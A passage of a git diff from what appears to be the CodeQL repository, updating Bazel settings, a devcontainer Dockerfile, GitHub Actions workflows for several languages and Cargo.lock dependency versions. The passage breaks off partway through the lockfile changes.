diff --git a/.bazelrc b/.bazelrc index 71c954c2b0b7..449345bfb629 100644 --- a/.bazelrc +++ b/.bazelrc @@ -37,5 +37,6 @@ build --java_language_version=17 build --tool_java_language_version=17 build --tool_java_runtime_version=remotejdk_17 build --java_runtime_version=remotejdk_17 +build --@rules_python//python/config_settings:python_version=3.12 try-import %workspace%/local.bazelrc diff --git a/.bazelrc.internal b/.bazelrc.internal index f7718959c9de..245cd98fbd84 100644 --- a/.bazelrc.internal +++ b/.bazelrc.internal @@ -8,3 +8,5 @@ common --registry=https://bcr.bazel.build # its implementation packages without providing any code itself. # We either can depend on internal implementation details, or turn of strict deps. common --@rules_dotnet//dotnet/settings:strict_deps=false + +build --@rules_python//python/config_settings:python_version=3.12 diff --git a/.devcontainer/Dockerfile.codespaces b/.devcontainer/Dockerfile.codespaces new file mode 100644 index 000000000000..89a80f6acd5e --- /dev/null +++ b/.devcontainer/Dockerfile.codespaces @@ -0,0 +1,7 @@ +FROM mcr.microsoft.com/devcontainers/base:ubuntu-24.04 + +USER root +# Install needed packages according to https://codeql.github.com/docs/codeql-overview/system-requirements/ +# most come from the base image, but we need to install some additional ones +RUN DEBIAN_FRONTEND=noninteractive apt update && apt install -y sudo man-db python3.12 npm unminimize +RUN yes | unminimize diff --git a/.devcontainer/devcontainer.json b/.devcontainer/devcontainer.json index a51284e3a1f6..61595e152b7f 100644 --- a/.devcontainer/devcontainer.json +++ b/.devcontainer/devcontainer.json @@ -1,5 +1,4 @@ { - "image": "mcr.microsoft.com/devcontainers/base:ubuntu-24.04", "extensions": [ "rust-lang.rust-analyzer", "bungcip.better-toml", @@ -8,6 +7,10 @@ "ms-vscode.test-adapter-converter", "slevesque.vscode-zipexplorer" ], + "build": { + // Path is relative to the devcontainer.json file. + "dockerfile": "Dockerfile.codespaces" + }, "settings": { "files.watcherExclude": { "**/target/**": true diff --git a/.github/codeql/codeql-config.yml b/.github/codeql/codeql-config.yml index 9740cf65147e..652e19dd4d00 100644 --- a/.github/codeql/codeql-config.yml +++ b/.github/codeql/codeql-config.yml @@ -4,9 +4,13 @@ queries: - uses: security-and-quality paths-ignore: + - '/actions/ql/test' - '/cpp/' - '/java/' - '/python/' - '/javascript/ql/test' + - '/javascript/ql/integration-tests' - '/javascript/extractor/tests' + - '/javascript/extractor/parser-tests' + - '/javascript/ql/src/' - '/rust/ql' diff --git a/.github/workflows/build-ripunzip.yml b/.github/workflows/build-ripunzip.yml index e7218a40e664..bd05313187cc 100644 --- a/.github/workflows/build-ripunzip.yml +++ b/.github/workflows/build-ripunzip.yml @@ -17,7 +17,7 @@ jobs: strategy: fail-fast: false matrix: - os: [ubuntu-20.04, macos-13, windows-2019] + os: [ubuntu-22.04, macos-13, windows-2019] runs-on: ${{ matrix.os }} steps: - uses: actions/checkout@v4 diff --git a/.github/workflows/codegen.yml b/.github/workflows/codegen.yml new file mode 100644 index 000000000000..24422eba10f8 --- /dev/null +++ b/.github/workflows/codegen.yml @@ -0,0 +1,34 @@ +name: Codegen + +on: + pull_request: + paths: + - "misc/bazel/**" + - "misc/codegen/**" + - "*.bazel*" + - .github/workflows/codegen.yml + - .pre-commit-config.yaml + branches: + - main + - rc/* + - codeql-cli-* + +permissions: + contents: read + +jobs: + codegen: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - uses: actions/setup-python@v4 + with: + python-version-file: 'misc/codegen/.python-version' + - uses: pre-commit/action@646c83fcd040023954eafda54b4db0192ce70507 + name: Check that python code is properly formatted + with: + extra_args: autopep8 --all-files + - name: Run codegen tests + shell: bash + run: | + bazel test //misc/codegen/... diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml index d571d961e677..ba384245e0eb 100644 --- a/.github/workflows/codeql-analysis.yml +++ b/.github/workflows/codeql-analysis.yml @@ -18,6 +18,10 @@ on: jobs: CodeQL-Build: + strategy: + fail-fast: false + matrix: + language: ['actions', 'csharp'] runs-on: ubuntu-latest @@ -38,9 +42,8 @@ jobs: # Initializes the CodeQL tools for scanning. - name: Initialize CodeQL uses: github/codeql-action/init@main - # Override language selection by uncommenting this and choosing your languages with: - languages: csharp + languages: ${{ matrix.language }} config-file: ./.github/codeql/codeql-config.yml # Autobuild attempts to build any compiled languages (C/C++, C#, or Java). diff --git a/.github/workflows/go-tests-rtjo.yml b/.github/workflows/go-tests-rtjo.yml new file mode 100644 index 000000000000..43721fa1011a --- /dev/null +++ b/.github/workflows/go-tests-rtjo.yml @@ -0,0 +1,22 @@ +name: "Go: Run RTJO Tests" +on: + pull_request: + types: + - labeled + +permissions: + contents: read + +jobs: + test-linux: + if: "github.repository_owner == 'github' && github.event.label.name == 'Run: RTJO Language Tests'" + name: RTJO Test Linux (Ubuntu) + runs-on: ubuntu-latest-xl + steps: + - name: Check out code + uses: actions/checkout@v4 + - name: Run tests + uses: ./go/actions/test + with: + run-code-checks: true + dynamic-join-order-mode: all diff --git a/.github/workflows/ruby-qltest-rtjo.yml b/.github/workflows/ruby-qltest-rtjo.yml new file mode 100644 index 000000000000..d7d1724cd4b6 --- /dev/null +++ b/.github/workflows/ruby-qltest-rtjo.yml @@ -0,0 +1,40 @@ +name: "Ruby: Run RTJO Language Tests" + +on: + pull_request: + types: + - opened + - synchronize + - reopened + - labeled + +env: + CARGO_TERM_COLOR: always + +defaults: + run: + working-directory: ruby + +permissions: + contents: read + +jobs: + qltest-rtjo: + if: "github.repository_owner == 'github' && github.event.label.name == 'Run: RTJO Language Tests'" + runs-on: ubuntu-latest-xl + strategy: + fail-fast: false + steps: + - uses: actions/checkout@v4 + - uses: ./.github/actions/fetch-codeql + - uses: ./ruby/actions/create-extractor-pack + - name: Cache compilation cache + id: query-cache + uses: ./.github/actions/cache-query-compilation + with: + key: ruby-qltest + - name: Run QL tests + run: | + codeql test run --dynamic-join-order-mode=all --threads=0 --ram 50000 --search-path "${{ github.workspace }}" --check-databases --check-undefined-labels --check-unused-labels --check-repeated-labels --check-redefined-labels --check-use-before-definition --consistency-queries ql/consistency-queries ql/test --compilation-cache "${{ steps.query-cache.outputs.cache-dir }}" + env: + GITHUB_TOKEN: ${{ github.token }} diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 23a97af6bafb..4af46d302ac6 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -18,45 +18,39 @@ on: - main - rc/* - codeql-cli-* - push: - paths: - - "swift/**" - - "misc/bazel/**" - - "misc/codegen/**" - - "shared/**" - - "*.bazel*" - - .github/workflows/swift.yml - - .github/actions/** - - codeql-workspace.yml - - .pre-commit-config.yaml - - "!**/*.md" - - "!**/*.qhelp" - branches: - - main - - rc/* - - codeql-cli-* permissions: contents: read +defaults: + run: + shell: bash + working-directory: swift + jobs: - # not using a matrix as you cannot depend on a specific job in a matrix, and we want to start linux checks - # without waiting for the macOS build - build-and-test-macos: + build-and-test: if: github.repository_owner == 'github' - runs-on: macos-13-xlarge - steps: - - uses: actions/checkout@v4 - - uses: ./swift/actions/build-and-test - qltests-macos: - if: ${{ github.repository_owner == 'github' && github.event_name == 'pull_request' }} - needs: build-and-test-macos - runs-on: macos-13-xlarge + strategy: + matrix: + runner: [ubuntu-latest, macos-13-xlarge] + fail-fast: false + runs-on: ${{ matrix.runner }} steps: - uses: actions/checkout@v4 - - uses: ./swift/actions/run-ql-tests + - name: Setup (Linux) + if: runner.os == 'Linux' + run: | + sudo apt-get update + sudo apt-get install -y uuid-dev zlib1g-dev + - name: Build Swift extractor + shell: bash + run: | + bazel run :install + - name: Run Swift tests + shell: bash + run: | + bazel test ... --test_tag_filters=-override --test_output=errors clang-format: - if : ${{ github.event_name == 'pull_request' }} runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -65,18 +59,9 @@ jobs: with: extra_args: clang-format --all-files codegen: - if : ${{ github.event_name == 'pull_request' }} runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - uses: bazelbuild/setup-bazelisk@v2 - - uses: actions/setup-python@v4 - with: - python-version-file: 'swift/.python-version' - - uses: pre-commit/action@646c83fcd040023954eafda54b4db0192ce70507 - name: Check that python code is properly formatted - with: - extra_args: autopep8 --all-files - uses: ./.github/actions/fetch-codeql - uses: pre-commit/action@646c83fcd040023954eafda54b4db0192ce70507 name: Check that QL generated code was checked in @@ -84,22 +69,14 @@ jobs: extra_args: swift-codegen --all-files - name: Generate C++ files run: | - bazel run //swift/codegen:codegen -- --generate=trap,cpp --cpp-output=$PWD/generated-cpp-files + bazel run codegen -- --generate=trap,cpp --cpp-output=$PWD/generated-cpp-files - uses: actions/upload-artifact@v4 with: name: swift-generated-cpp-files path: generated-cpp-files/** - database-upgrade-scripts: - if : ${{ github.event_name == 'pull_request' }} - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@v4 - - uses: ./.github/actions/fetch-codeql - - uses: ./swift/actions/database-upgrade-scripts check-no-override: - if : github.event_name == 'pull_request' runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - - shell: bash - run: bazel test //swift/... --test_tag_filters=override --test_output=errors + - name: Check that no override is present in load.bzl + run: bazel test ... --test_tag_filters=override --test_output=errors diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml index c0bd4abd0d02..42333e91289e 100644 --- a/.pre-commit-config.yaml +++ b/.pre-commit-config.yaml @@ -72,7 +72,7 @@ repos: - id: rust-codegen name: Run Rust checked in code generation - files: ^misc/codegen/|^rust/(prefix\.dbscheme|schema/|codegen/|.*/generated/|ql/lib/(rust\.dbscheme$|codeql/rust/elements)|\.generated.list) + files: ^misc/codegen/|^rust/(prefix\.dbscheme|schema/|codegen/|.*/generated/|ql/lib/(rust\.dbscheme$|codeql/rust/elements)|\.generated.list|ast-generator/) language: system entry: bazel run //rust/codegen -- --quiet pass_filenames: false diff --git a/.vscode/tasks.json b/.vscode/tasks.json index 5e4b9397d26d..5786439f38fb 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -50,6 +50,11 @@ "${input:name}", "${input:categoryQuery}" ], + "options": { + "env": { + "EDITOR": "code -r", + } + }, "presentation": { "reveal": "never", "close": true @@ -67,6 +72,11 @@ "${input:name}", "${input:categoryLibrary}" ], + "options": { + "env": { + "EDITOR": "code -r" + } + }, "presentation": { "reveal": "never", "close": true diff --git a/Cargo.lock b/Cargo.lock index 48aa23d25ea3..7719e26ffd24 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -1,6 +1,6 @@ # This file is automatically @generated by Cargo. # It is not intended for manual editing. -version = 3 +version = 4 [[package]] name = "adler2" @@ -18,13 +18,10 @@ dependencies = [ ] [[package]] -name = "always-assert" -version = "0.2.0" +name = "allocator-api2" +version = "0.2.21" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1078fa1ce1e34b1872d8611ad921196d76bdd7027e949fbe31231abde201892" -dependencies = [ - "tracing", -] +checksum = "683d7910e743518b0e34f1186f92494becacb047c7b6bf616c96772180fef923" [[package]] name = "android-tzdata" @@ -82,19 +79,20 @@ dependencies = [ [[package]] name = "anstyle-wincon" -version = "3.0.6" +version = "3.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2109dbce0e72be3ec00bed26e6a7479ca384ad226efdd66db8fa2e3a38c83125" +checksum = "ca3534e77181a9cc07539ad51f2141fe32f6c3ffd4df76db8ad92346b003ae4e" dependencies = [ "anstyle", + "once_cell", "windows-sys 0.59.0", ] [[package]] name = "anyhow" -version = "1.0.95" +version = "1.0.97" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34ac096ce696dc2fcabef30516bb13c0a68a11d30131d3df6f04711467681b04" +checksum = "dcfed56ad506cb2c684a14971b8861fdc3baaaae314b9e5f9bb532cbe3ba7a4f" [[package]] name = "argfile" @@ -156,9 +154,9 @@ checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a" [[package]] name = "bitflags" -version = "2.7.0" +version = "2.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1be3f42a67d6d345ecd59f675f3f012d6974981560836e938c22b424b85ce1be" +checksum = "8f68f53c83ab957f72c32642f3868eec03eb974d1fb82e453128456482613d36" [[package]] name = "borsh" @@ -169,6 +167,15 @@ dependencies = [ "cfg_aliases", ] +[[package]] +name = "boxcar" +version = "0.2.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6740c6e2fc6360fa57c35214c7493826aee95993926092606f27c983b40837be" +dependencies = [ + "loom", +] + [[package]] name = "bstr" version = "1.11.3" @@ -252,9 +259,9 @@ checksum = "613afe47fcd5fac7ccf1db93babcb082c5994d996f20b8b159f2ad1658eb5724" [[package]] name = "chalk-derive" -version = "0.98.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9426c8fd0fe61c3da880b801d3b510524df17843a8f9ec1f5b9cec24fb7412df" +checksum = "ab2d131019373f0d0d1f2af0abd4f719739f6583c1b33965112455f643a910af" dependencies = [ "proc-macro2", "quote", @@ -264,19 +271,19 @@ dependencies = [ [[package]] name = "chalk-ir" -version = "0.98.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5f2eb1cd6054da221bd1ac0197fb2fe5e2caf3dcb93619398fc1433f8f09093" +checksum = "4f114996bda14c0213f014a4ef31a7867dcf5f539a3900477fc6b20138e7a17b" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", "chalk-derive", ] [[package]] name = "chalk-recursive" -version = "0.98.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "129dc03458f71cfb9c3cd621c9c68166a94e87b85b16ccd29af015d7ff9a1c61" +checksum = "551e956e031c09057c7b21f17d48d91de99c9b6b6e34bceaf5e7202d71021268" dependencies = [ "chalk-derive", "chalk-ir", @@ -287,9 +294,9 @@ dependencies = [ [[package]] name = "chalk-solve" -version = "0.98.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d7e8a8c1e928f98cdf227b868416ef21dcd8cc3c61b347576d783713444d41c8" +checksum = "cd7ca50181156ce649efe8e5dd00580f573651554e4dcd11afa4e2ac93f53324" dependencies = [ "chalk-derive", "chalk-ir", @@ -303,9 +310,9 @@ dependencies = [ [[package]] name = "chrono" -version = "0.4.39" +version = "0.4.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e36cc9d416881d2e24f9a963be5fb1cd90966419ac844274161d10488b3e825" +checksum = "1a7964611d71df112cb1730f2ee67324fcf4d0fc6606acbbe9bfe06df124637c" dependencies = [ "android-tzdata", "iana-time-zone", @@ -313,14 +320,14 @@ dependencies = [ "num-traits", "serde", "wasm-bindgen", - "windows-targets 0.52.6", + "windows-link", ] [[package]] name = "clap" -version = "4.5.26" +version = "4.5.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8eb5e908ef3a6efbe1ed62520fb7287959888c88485abe072543190ecc66783" +checksum = "6088f3ae8c3608d19260cd7445411865a485688711b78b5be70d78cd96136f83" dependencies = [ "clap_builder", "clap_derive", @@ -328,9 +335,9 @@ dependencies = [ [[package]] name = "clap_builder" -version = "4.5.26" +version = "4.5.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96b01801b5fc6a0a232407abc821660c9c6d25a1cafc0d4f85f29fb8d9afc121" +checksum = "22a7ef7f676155edfb82daa97f99441f3ebf4a58d5e32f295a56259f1b6facc8" dependencies = [ "anstream", "anstyle", @@ -340,11 +347,11 @@ dependencies = [ [[package]] name = "clap_derive" -version = "4.5.24" +version = "4.5.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "54b755194d6389280185988721fffba69495eed5ee9feeee9a599b53db80318c" +checksum = "09176aae279615badda0765c0c0b3f6ed53f4709118af73cf4655d85d1530cd7" dependencies = [ - "heck 0.5.0", + "heck", "proc-macro2", "quote", "syn", @@ -408,6 +415,7 @@ version = "0.1.0" dependencies = [ "anyhow", "argfile", + "chalk-ir", "chrono", "clap", "codeql-extractor", @@ -421,6 +429,7 @@ dependencies = [ "ra_ap_hir", "ra_ap_hir_def", "ra_ap_hir_expand", + "ra_ap_hir_ty", "ra_ap_ide_db", "ra_ap_intern", "ra_ap_load-cargo", @@ -502,6 +511,15 @@ dependencies = [ "crossbeam-utils", ] +[[package]] +name = "crossbeam-queue" +version = "0.3.12" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f58bbc28f91df819d0aa2a2c00cd19754769c2fad90579b3592b1c9ba7a3115" +dependencies = [ + "crossbeam-utils", +] + [[package]] name = "crossbeam-utils" version = "0.8.21" @@ -556,6 +574,20 @@ dependencies = [ "parking_lot_core", ] +[[package]] +name = "dashmap" +version = "6.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5041cc499144891f3790297212f32a74fb938e5136a14943f338ef9e0ae276cf" +dependencies = [ + "cfg-if", + "crossbeam-utils", + "hashbrown 0.14.5", + "lock_api", + "once_cell", + "parking_lot_core", +] + [[package]] name = "deranged" version = "0.3.11" @@ -580,9 +612,9 @@ checksum = "92773504d58c093f6de2459af4af33faa518c13451eb8f2b5698ed3d36e7c813" [[package]] name = "either" -version = "1.13.0" +version = "1.15.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60b1af1c220855b6ceac025d3f6ecdd2b7c4894bfe9cd9bda4fbb4bc7c0d4cf0" +checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719" [[package]] name = "ena" @@ -590,7 +622,7 @@ version = "0.14.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3d248bdd43ce613d87415282f69b9bb99d947d290b10962dd6c56233312c2ad5" dependencies = [ - "log 0.4.22", + "log 0.4.25", ] [[package]] @@ -697,9 +729,9 @@ checksum = "0ce7134b9999ecaf8bcd65542e436736ef32ddca1b3e06094cb6ec5755203b80" [[package]] name = "flate2" -version = "1.0.35" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c936bfdafb507ebbf50b8074c54fa31c5be9a1e7e5f467dd659697041407d07c" +checksum = "11faaf5a5236997af9848be0bef4db95824b1d534ebc64d0f0c6cf3e67bd38dc" dependencies = [ "crc32fast", "miniz_oxide", @@ -711,6 +743,12 @@ version = "1.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3f9eec918d3f24069decb9af1554cad7c880e2da24a9afd88aca000531ab82c1" +[[package]] +name = "foldhash" +version = "0.1.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2" + [[package]] name = "fs-err" version = "2.11.0" @@ -735,15 +773,29 @@ version = "0.4.7" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7ab85b9b05e3978cc9a9cf8fea7f01b494e1a09ed3037e16ba39edc7a29eb61a" +[[package]] +name = "generator" +version = "0.8.4" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cc6bd114ceda131d3b1d665eba35788690ad37f5916457286b32ab6fd3c438dd" +dependencies = [ + "cfg-if", + "libc", + "log 0.4.25", + "rustversion", + "windows", +] + [[package]] name = "getrandom" -version = "0.2.15" +version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c4567c8db10ae91089c99af84c68c38da3ec2f087c3f82960bcdbf3656b6f4d7" +checksum = "43a49c392881ce6d5c3b8cb70f98717b7c07aabbdff06687b9030dbfbe2725f8" dependencies = [ "cfg-if", "libc", - "wasi", + "wasi 0.13.3+wasi-0.2.2", + "windows-targets 0.52.6", ] [[package]] @@ -760,7 +812,7 @@ checksum = "15f1ce686646e7f1e19bf7d5533fe443a45dbfb990e00629110797578b42fb19" dependencies = [ "aho-corasick", "bstr", - "log 0.4.22", + "log 0.4.25", "regex-automata 0.4.9", "regex-syntax 0.8.5", ] @@ -782,12 +834,20 @@ name = "hashbrown" version = "0.15.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "bf151400ff0baff5465007dd2f3e717f3fe502074ca563069ce3a6629d07b289" +dependencies = [ + "allocator-api2", + "equivalent", + "foldhash", +] [[package]] -name = "heck" -version = "0.4.1" +name = "hashlink" +version = "0.10.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "95505c38b4572b2d910cecb0281560f54b440a19336cbbcb27bf6ce6adc6f5a8" +checksum = "7382cf6263419f2d8df38c55d7da83da5c18aef87fc7a7fc1fb1e344edfe14c1" +dependencies = [ + "hashbrown 0.15.2", +] [[package]] name = "heck" @@ -827,7 +887,7 @@ dependencies = [ "iana-time-zone-haiku", "js-sys", "wasm-bindgen", - "windows-core", + "windows-core 0.52.0", ] [[package]] @@ -875,11 +935,11 @@ checksum = "c8fae54786f62fb2918dcfae3d568594e50eb9b5c25bf04371af6fe7516452fb" [[package]] name = "inotify" -version = "0.9.6" +version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8069d3ec154eb856955c1c0fbffefbf5f3c40a104ec912d4797314c1801abff" +checksum = "f37dccff2791ab604f9babef0ba14fbe0be30bd368dc541e2b08d07c8aa908f3" dependencies = [ - "bitflags 1.3.2", + "bitflags 2.8.0", "inotify-sys", "libc", ] @@ -983,7 +1043,7 @@ version = "0.1.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c0ff37bd590ca25063e35af745c343cb7a0271906fb7b37e4813e8f79f00268d" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", "libc", "redox_syscall", ] @@ -1014,14 +1074,27 @@ version = "0.3.9" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e19e8d5c34a3e0e2223db8e060f9e8264aeeb5c5fc64a4ee9965c062211c024b" dependencies = [ - "log 0.4.22", + "log 0.4.25", ] [[package]] name = "log" -version = "0.4.22" +version = "0.4.25" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a7a70ba024b9dc04c27ea2f0c0548feb474ec5c54bba33a7f72f873a39d07b24" +checksum = "04cbf5b083de1c7e0222a7a51dbfdba1cbe1c6ab0b15e29fff3f6c077fd9cd9f" + +[[package]] +name = "loom" +version = "0.7.2" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "419e0dc8046cb947daa77eb95ae174acfbddb7673b4151f56d1eed8e93fbfaca" +dependencies = [ + "cfg-if", + "generator", + "scoped-tls", + "tracing", + "tracing-subscriber", +] [[package]] name = "lz4_flex" @@ -1055,23 +1128,23 @@ dependencies = [ [[package]] name = "miniz_oxide" -version = "0.8.2" +version = "0.8.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4ffbe83022cedc1d264172192511ae958937694cd57ce297164951b8b3568394" +checksum = "8e3e04debbb59698c15bacbb6d93584a8c0ca9cc3213cb423d31f760d8843ce5" dependencies = [ "adler2", ] [[package]] name = "mio" -version = "0.8.11" +version = "1.0.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a4a650543ca06a924e8b371db273b2756685faae30f8487da1b56505a8f78b0c" +checksum = "2886843bf800fba2e3377cff24abf6379b4c4d5c6681eaf9ea5b0d15090450bd" dependencies = [ "libc", - "log 0.4.22", - "wasi", - "windows-sys 0.48.0", + "log 0.4.25", + "wasi 0.11.0+wasi-snapshot-preview1", + "windows-sys 0.52.0", ] [[package]] @@ -1101,23 +1174,29 @@ checksum = "2bf50223579dc7cdcfb3bfcacf7069ff68243f8c363f62ffa99cf000a6b9c451" [[package]] name = "notify" -version = "6.1.1" +version = "8.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6205bd8bb1e454ad2e27422015fb5e4f2bcc7e08fa8f27058670d208324a4d2d" +checksum = "2fee8403b3d66ac7b26aee6e40a897d85dc5ce26f44da36b8b73e987cc52e943" dependencies = [ - "bitflags 2.7.0", - "crossbeam-channel", + "bitflags 2.8.0", "filetime", "fsevent-sys", "inotify", "kqueue", "libc", - "log 0.4.22", + "log 0.4.25", "mio", + "notify-types", "walkdir", - "windows-sys 0.48.0", + "windows-sys 0.59.0", ] +[[package]] +name = "notify-types" +version = "2.0.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5e0826a989adedc2a244799e823aece04662b66609d96af8dff7ac6df9a8925d" + [[package]] name = "nu-ansi-term" version = "0.46.0" @@ -1155,9 +1234,9 @@ dependencies = [ [[package]] name = "once_cell" -version = "1.20.2" +version = "1.20.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1261fe7e33c73b354eab43b1273a57c8f967d0391e80353e51f764ac02cf6775" +checksum = "945462a4b81e43c4e3ba96bd7b49d834c6f61198356aa858733bc4acf3cbe62e" [[package]] name = "oorandom" @@ -1261,6 +1340,12 @@ version = "0.2.16" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3b3cff922bd51709b605d9ead9aa71031d81447142d828eb4a6eba76fe619f9b" +[[package]] +name = "portable-atomic" +version = "1.11.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "350e9b48cbc6b0e028b0473b114454c6316e57336ee184ceab6e53f72c178b3e" + [[package]] name = "powerfmt" version = "0.2.0" @@ -1273,14 +1358,14 @@ version = "0.2.20" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "77957b295656769bb8ad2b6a6b09d897d94f05c41b069aede1fcdaa675eaea04" dependencies = [ - "zerocopy", + "zerocopy 0.7.35", ] [[package]] name = "proc-macro2" -version = "1.0.93" +version = "1.0.94" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60946a68e5f9d28b0dc1c21bb8a97ee7d018a8b322fa57838ba31cc878e22d99" +checksum = "a31971752e70b8b2686d7e46ec17fb38dad4051d94024c88df49b667caea9c84" dependencies = [ "unicode-ident", ] @@ -1300,29 +1385,39 @@ dependencies = [ [[package]] name = "quote" -version = "1.0.38" +version = "1.0.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0e4dccaaaf89514f546c693ddc140f729f958c247918a13380cccc6078391acc" +checksum = "1885c039570dc00dcb4ff087a89e185fd56bae234ddc7f056a945bf36467248d" dependencies = [ "proc-macro2", ] [[package]] name = "ra-ap-rustc_abi" -version = "0.87.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28b782af0a7a8df16ddf43cd70da9f17bc3b1ce712c9e4992b6edb16f5f53632" +checksum = "f1651b0f7e8c3eb7c27a88f39d277e69c32bfe58e3be174d286c1a24d6a7a4d8" dependencies = [ - "bitflags 2.7.0", + "bitflags 2.8.0", + "ra-ap-rustc_hashes", "ra-ap-rustc_index", "tracing", ] +[[package]] +name = "ra-ap-rustc_hashes" +version = "0.100.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2bcd85e93dc0ea850bcfe7957a115957df799ccbc9eea488bdee5ec6780d212b" +dependencies = [ + "rustc-stable-hash", +] + [[package]] name = "ra-ap-rustc_index" -version = "0.87.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ce5742f134960482f543b35ecebec3cacc6d79a9a685713518b4d8d70c5f9aa8" +checksum = "62b295fc0640cd9fe0ecab872ee4a17a96f90a3998ec9f0c4765e9b8415c12cc" dependencies = [ "ra-ap-rustc_index_macros", "smallvec", @@ -1330,9 +1425,9 @@ dependencies = [ [[package]] name = "ra-ap-rustc_index_macros" -version = "0.87.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d7ea011fcf68309a8835ad01d91c032cb18444617b00e2cab21d45b208164441" +checksum = "c675f4257023aa933882906f13802cae287e88cc39ab13cbb96809083db0c801" dependencies = [ "proc-macro2", "quote", @@ -1341,19 +1436,20 @@ dependencies = [ [[package]] name = "ra-ap-rustc_lexer" -version = "0.87.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eb76f0a4d4c20859e41f0a23bff0f37ab9ca9171c214a6c7dd72ea69434865dc" +checksum = "c8358702c2a510ea84ba5801ddc047d9ad9520902cfb0e6173277610cdce2c9c" dependencies = [ + "memchr", "unicode-properties", "unicode-xid", ] [[package]] name = "ra-ap-rustc_parse_format" -version = "0.87.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "06080bd35078305421a62da77f3c128482d8d44441b6da8ce9d146d1cd9cdb5b" +checksum = "b98f402011d46732c35c47bfd111dec0495747fef2ec900ddee7fe15d78449a7" dependencies = [ "ra-ap-rustc_index", "ra-ap-rustc_lexer", @@ -1361,12 +1457,12 @@ dependencies = [ [[package]] name = "ra-ap-rustc_pattern_analysis" -version = "0.87.0" +version = "0.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "68a3154fe4c20c177d7b3c678a2d3a97aba0cca156ddef88959915041889daf0" +checksum = "bef3ff73fa4653252ffe1d1e9177a446f49ef46d97140e4816b7ff2dad59ed53" dependencies = [ "ra-ap-rustc_index", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", "rustc_apfloat", "smallvec", "tracing", @@ -1374,20 +1470,22 @@ dependencies = [ [[package]] name = "ra_ap_base_db" -version = "0.0.258" +version = "0.0.270" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "548b95b278a8f6f888a0bb6cb7bf4201fe920d3800cd99770054e5eb72f3cd6a" +checksum = "4baa9734d254af14fd603528ad594650dea601b1764492bd39988da38598ae67" dependencies = [ + "dashmap 5.5.3", "la-arena", "lz4_flex", "ra_ap_cfg", "ra_ap_intern", - "ra_ap_salsa", + "ra_ap_query-group-macro", "ra_ap_span", "ra_ap_stdx", "ra_ap_syntax", "ra_ap_vfs", - "rustc-hash 2.1.0", + "rustc-hash 2.1.1", + "salsa", "semver", "tracing", "triomphe", @@ -1395,30 +1493,31 @@ dependencies = 